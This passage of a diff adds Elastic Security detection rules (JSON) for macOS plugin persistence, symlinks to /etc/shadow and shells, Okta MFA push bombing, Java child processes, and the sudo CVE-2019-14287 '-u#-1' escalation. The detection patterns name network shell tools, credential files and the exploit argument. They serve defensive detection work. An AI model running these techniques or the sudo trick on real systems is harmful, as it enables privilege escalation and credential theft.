+ "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_106.json b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_106.json new file mode 100644 index 00000000000..1160d651838 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/89fa6cb7-6b53-4de2-b604-648488841ab8_106.json @@ -0,0 +1,80 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of a DirectoryService PlugIns (dsplug) file. The DirectoryService daemon launches on each system boot and automatically reloads after crash. It scans and executes bundles that are located in the DirectoryServices PlugIns folder and can be abused by adversaries to maintain persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Persistence via DirectoryService Plugin Modification", + "query": "event.category:file and host.os.type:macos and not event.type:deletion and\n file.path:/Library/DirectoryServices/PlugIns/*.dsplug\n", + "references": [ + "https://blog.chichou.me/2019/11/21/two-macos-persistence-tricks-abusing-plugins/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "89fa6cb7-6b53-4de2-b604-648488841ab8", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "89fa6cb7-6b53-4de2-b604-648488841ab8_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_5.json b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_5.json new file mode 100644 index 00000000000..f2205118396 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8a024633-c444-45c0-a4fe-78128d8c1ab6_5.json @@ -0,0 +1,127 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a symbolic link to a suspicious file or location. A symbolic link is a reference to a file or directory that acts as a pointer or shortcut, allowing users to access the target file or directory from a different location in the file system. An attacker can potentially leverage symbolic links for privilege escalation by tricking a privileged process into following the symbolic link to a sensitive file, giving the attacker access to data or capabilities they would not normally have.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Symbolic Link Created", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nprocess.name == \"ln\" and process.args in (\"-s\", \"-sf\") and \n (\n /* suspicious files */\n (process.args in (\"/etc/shadow\", \"/etc/shadow-\", \"/etc/shadow~\", \"/etc/gshadow\", \"/etc/gshadow-\") or \n (process.working_directory == \"/etc\" and process.args in (\"shadow\", \"shadow-\", \"shadow~\", \"gshadow\", \"gshadow-\"))) or \n \n /* suspicious bins */\n (process.args in (\"/bin/bash\", \"/bin/dash\", \"/bin/sh\", \"/bin/tcsh\", \"/bin/csh\", \"/bin/zsh\", \"/bin/ksh\", \"/bin/fish\") or \n (process.working_directory == \"/bin\" and process.args : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"))) or \n (process.args in (\"/usr/bin/bash\", \"/usr/bin/dash\", \"/usr/bin/sh\", \"/usr/bin/tcsh\", \"/usr/bin/csh\", \"/usr/bin/zsh\", \"/usr/bin/ksh\", \"/usr/bin/fish\") or \n (process.working_directory == \"/usr/bin\" and process.args in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"))) or\n \n /* suspicious locations */\n (process.args : (\"/etc/cron.d/*\", \"/etc/cron.daily/*\", \"/etc/cron.hourly/*\", \"/etc/cron.weekly/*\", \"/etc/cron.monthly/*\")) or\n (process.args : (\"/home/*/.ssh/*\", \"/root/.ssh/*\",\"/etc/sudoers.d/*\", \"/dev/shm/*\"))\n ) and \n process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and \n not user.Ext.real.id == \"0\" and not group.Ext.real.id == \"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "group.Ext.real.id", + "type": "unknown" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + }, + { + "ecs": false, + "name": "user.Ext.real.id", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "8a024633-c444-45c0-a4fe-78128d8c1ab6", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.008", + "name": "/etc/passwd and /etc/shadow", + "reference": "https://attack.mitre.org/techniques/T1003/008/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "8a024633-c444-45c0-a4fe-78128d8c1ab6_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_3.json b/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_3.json new file mode 100644 index 00000000000..70895a3a31f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8a0fbd26-867f-11ee-947c-f661ea17fbcd_3.json @@ -0,0 +1,82 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when an attacker abuses the Multi-Factor authentication mechanism by repeatedly issuing login requests until the user eventually accepts the Okta push notification. An adversary may attempt to bypass the Okta MFA policies configured for an organization to obtain unauthorized access.", + "event_category_override": "event.category", + "index": [ + "filebeat-*", + "logs-okta*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Okta MFA Bombing via Push Notifications", + "note": "## Triage and analysis\n\n### Investigating Potential Okta MFA Bombing via Push Notifications\n\nMulti-Factor Authentication (MFA) is an effective method to prevent unauthorized access. However, some adversaries may abuse the system by repeatedly sending MFA push notifications until the user unwittingly approves the access.\n\nThis rule detects when a user denies MFA Okta Verify push notifications twice, followed by a successful authentication event within a 10-minute window. This sequence could indicate an adversary's attempt to bypass the Okta MFA policy.\n\n#### Possible investigation steps:\n\n- Identify the user who received the MFA notifications by reviewing the `user.email` field.\n- Identify the time, source IP, and geographical location of the MFA requests and the subsequent successful login.\n- Review the `event.action` field to understand the nature of the events. It should include two `user.mfa.okta_verify.deny_push` actions and one `user.authentication.sso` action.\n- Ask the user if they remember receiving the MFA notifications and subsequently logging into their account.\n- Check if the MFA requests and the successful login occurred during the user's regular activity hours.\n- Look for any other suspicious activity on the account around the same time.\n- Identify whether the same pattern is repeated for other users in your organization. Multiple users receiving push notifications simultaneously might indicate a larger attack.\n\n### False positive analysis:\n\n- Determine if the MFA push notifications were legitimate. Sometimes, users accidentally trigger MFA requests or deny them unintentionally and later approve them.\n- Check if there are known issues with the MFA system causing false denials.\n\n### Response and remediation:\n\n- If unauthorized access is confirmed, initiate your incident response process.\n- Alert the user and your IT department immediately.\n- If possible, isolate the user's account until the issue is resolved.\n- Investigate the source of the unauthorized access.\n- If the account was accessed by an unauthorized party, determine the actions they took after logging in.\n- Consider enhancing your MFA policy to prevent such incidents in the future.\n- Encourage users to report any unexpected MFA notifications immediately.\n- Review and update your incident response plans and security policies based on the findings from the incident.\n", + "query": "sequence by okta.actor.id with maxspan=10m\n [authentication where event.dataset == \"okta.system\"\n and okta.event_type == \"user.mfa.okta_verify.deny_push\"] with runs=5\n until [authentication where event.dataset == \"okta.system\"\n and (okta.event_type: (\n \"user.authentication.sso\",\n \"user.authentication.auth_via_mfa\",\n \"user.authentication.verify\",\n \"user.session.start\") and okta.outcome.result == \"SUCCESS\")]\n", + "references": [ + "https://www.mandiant.com/resources/russian-targeting-gov-business", + "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", + "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", + "https://www.rezonate.io/blog/okta-logs-decoded-unveiling-identity-threats-through-threat-hunting/" + ], + "related_integrations": [ + { + "package": "okta", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.actor.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.event_type", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.outcome.result", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "8a0fbd26-867f-11ee-947c-f661ea17fbcd", + "setup": "## Setup\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n", + "severity": "high", + "tags": [ + "Use Case: Identity and Access Audit", + "Tactic: Credential Access", + "Data Source: Okta" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1621", + "name": "Multi-Factor Authentication Request Generation", + "reference": "https://attack.mitre.org/techniques/T1621/" + } + ] + } + ], + "type": "eql", + "version": 3 + }, + "id": "8a0fbd26-867f-11ee-947c-f661ea17fbcd_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_107.json b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_107.json new file mode 100644 index 00000000000..9eb4e98da73 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_107.json @@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a script interpreter or signed binary is launched via a non-standard working directory. An attacker may use this technique to evade defenses.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution from a Mounted Device", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.executable : \"C:\\\\*\" and\n (process.working_directory : \"?:\\\\\" and not process.working_directory: \"C:\\\\\") and\n process.parent.name : \"explorer.exe\" and\n process.name : (\"rundll32.exe\", \"mshta.exe\", \"powershell.exe\", \"pwsh.exe\", \"cmd.exe\", \"regsvr32.exe\",\n \"cscript.exe\", \"wscript.exe\")\n", + "references": [ + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", + "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8a1d4831-3ce6-4859-9891-28931fa6101d", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.005", + "name": "Mshta", + "reference": "https://attack.mitre.org/techniques/T1218/005/" + }, + { + "id": "T1218.010", + "name": "Regsvr32", + "reference": "https://attack.mitre.org/techniques/T1218/010/" + }, + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "8a1d4831-3ce6-4859-9891-28931fa6101d_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_108.json b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_108.json new file mode 100644 index 00000000000..35a307cf8f9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8a1d4831-3ce6-4859-9891-28931fa6101d_108.json @@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a script interpreter or signed binary is launched via a non-standard working directory. An attacker may use this technique to evade defenses.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution from a Mounted Device", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.executable : \"C:\\\\*\" and\n (process.working_directory : \"?:\\\\\" and not process.working_directory: \"C:\\\\\") and\n process.parent.name : \"explorer.exe\" and\n process.name : (\"rundll32.exe\", \"mshta.exe\", \"powershell.exe\", \"pwsh.exe\", \"cmd.exe\", \"regsvr32.exe\",\n \"cscript.exe\", \"wscript.exe\")\n", + "references": [ + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", + "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8a1d4831-3ce6-4859-9891-28931fa6101d", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.005", + "name": "Mshta", + "reference": "https://attack.mitre.org/techniques/T1218/005/" + }, + { + "id": "T1218.010", + "name": "Regsvr32", + "reference": "https://attack.mitre.org/techniques/T1218/010/" + }, + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "8a1d4831-3ce6-4859-9891-28931fa6101d_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_208.json b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_208.json new file mode 100644 index 00000000000..8217ebbba7a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8acb7614-1d92-4359-bfcf-478b6d9de150_208.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious child processes of the Java interpreter process. This may indicate an attempt to execute a malicious JAR file or an exploitation attempt via a JAVA specific vulnerability.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious JAVA Child Process", + "new_terms_fields": [ + "host.id", + "process.command_line" + ], + "note": "## Triage and analysis\n\n### Investigating Suspicious Java Child Process\n\nThis rule identifies a suspicious child process of the Java interpreter process. It may indicate an attempt to execute a malicious JAR file or an exploitation attempt via a Java specific vulnerability.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n- Examine the command line to determine if the command executed is potentially harmful or malicious.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and event.type:(\"start\" or \"process_started\") and process.parent.name:\"java\" and process.name:(\n bash or dash or sh or tcsh or csh or zsh or ksh or fish or python* or php* or perl or ruby or lua* or openssl or\n nc or netcat or ncat or telnet or awk or socat or wget or curl\n) and process.args :(\n whoami or id or uname or cat or hostname or ip or curl or wget or pwd or ls or cd or python* or php* or perl or\n ruby or lua* or openssl or nc or netcat or ncat or telnet or awk or socat\n)\n", + "references": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://github.com/christophetd/log4shell-vulnerable-app", + "https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf", + "https://www.elastic.co/security-labs/detecting-log4j2-with-elastic-security", + "https://www.elastic.co/security-labs/analysis-of-log4shell-cve-2021-45046" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8acb7614-1d92-4359-bfcf-478b6d9de150", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.007", + "name": "JavaScript", + "reference": "https://attack.mitre.org/techniques/T1059/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 208 + }, + "id": "8acb7614-1d92-4359-bfcf-478b6d9de150_208", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_4.json b/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_4.json new file mode 100644 index 00000000000..64b7e2bcf08 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8af5b42f-8d74-48c8-a8d0-6d14b4197288_4.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of a suspicious sudo command that is leveraged in CVE-2019-14287 to escalate privileges to root. Sudo does not verify the presence of the designated user ID and proceeds to execute using a user ID that can be chosen arbitrarily. By using the sudo privileges, the command \"sudo -u#-1\" translates to an ID of 0, representing the root user. This exploit may work for sudo versions prior to v1.28.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Sudo Privilege Escalation via CVE-2019-14287", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"sudo\" and process.args == \"-u#-1\"\n", + "references": [ + "https://www.exploit-db.com/exploits/47502" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8af5b42f-8d74-48c8-a8d0-6d14b4197288", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as 